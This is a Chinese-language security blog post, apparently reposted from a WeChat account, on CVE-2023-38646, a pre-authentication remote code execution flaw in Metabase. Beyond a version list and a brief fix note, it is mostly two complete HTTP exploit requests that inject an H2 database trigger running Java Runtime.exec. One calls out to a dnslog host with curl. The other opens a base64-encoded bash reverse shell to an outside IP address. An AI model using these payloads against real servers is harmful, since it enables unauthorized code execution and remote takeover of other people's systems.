0x01 前言
0x02 影响平台
= 0.46.6.1= 1.46.6.1= v0.45.4.1= v1.45.4.1= v0.44.7.1= v1.44.7.1= v0.43.7.2= v1.43.7.2
0x03 漏洞复现
页面是这个酱紫
EXP:
POST /api/setup/validate HTTP/1.1Host: ip:portSec-Ch-Ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 750{"token": "a50eb257-e56c-4dd8-b4ba-e67d7bc59261","details":{"is_on_demand": false,"is_full_sync": false,"is_sample": false,"cache_ttl": null,"refingerprint": false,"auto_run_queries": true,"schedules":{},"details":{"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptnjava.lang.Runtime.getRuntime().exec('curl ui88te.dnslog.cn')n$$--=x","advanced-options": false,"ssl": true},"name": "an-sec-research-team","engine": "h2"}}
success
反弹shell如下PAYLOAD:
POST /api/setup/validate HTTP/1.1Host: 127.0.0.1:3000Sec-Ch-Ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 750{"token": "a50eb257-e56c-4dd8-b4ba-e67d7bc59261","details":{"is_on_demand": false,"is_full_sync": false,"is_sample": false,"cache_ttl": null,"refingerprint": false,"auto_run_queries": true,"schedules":{},"details":{"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptnjava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYwLjEyOS84ODg4ICAwPiYx}|{base64,-d}|{bash,-i}')n$$--=x","advanced-options": false,"ssl": true},"name": "an-sec-research-team","engine": "h2"}}
0x04 参考来源
https://mp.weixin.qq.com/s/PUjrLI-IzBeDtZVXqpuDDg0x05 修复方案
目前厂商已发布升级补丁以修复漏洞,建议及时更新至最新版本!https://www.metabase.com/blog/security-advisoryhttps://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
往期回顾
-
![CVE-2023-38646 RCE漏洞(附EXP)]( "CVE-2023-38646 RCE漏洞(附EXP)")
关注我
获得更多精彩
![CVE-2023-38646 RCE漏洞(附EXP)]( "CVE-2023-38646 RCE漏洞(附EXP)")
-
-
觉得内容不错,就点下“赞”和“在看”
如侵权请私聊公众号删文
原文始发于微信公众号(EchoSec):CVE-2023-38646 RCE漏洞(附EXP)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论